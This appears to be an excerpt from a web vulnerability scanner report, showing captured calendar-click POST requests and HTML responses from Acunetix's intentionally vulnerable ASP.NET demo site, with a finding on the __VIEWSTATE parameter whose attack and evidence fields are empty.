Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8557&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAq%2FggZtsIZGRkG3u3frM1BRDAFS1SEpH1JJQgMD4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKPprfLCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IM%2BHjLvap8R5ltZS9pFe6r8Cvc9Ow%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:41 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAq/ggZtsIZGRkG3u3frM1BRDAFS1SEpH1JJQgMD4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKPprfLCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IM+HjLvap8R5ltZS9pFe6r8Cvc9Ow=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:White" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8561&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAUqJFadsIZGRkA3QhMjKmutvbYYov2%2BYRW%2B5Dv%2FE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs3N33CgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMOTJxPu%2BzRS%2FH9GYIednJC9d%2FT%2Fo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:21 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAUqJFadsIZGRkA3QhMjKmutvbYYov2+YRW+5Dv/E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs3N33CgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMOTJxPu+zRS/H9GYIednJC9d/T/o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:White" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> 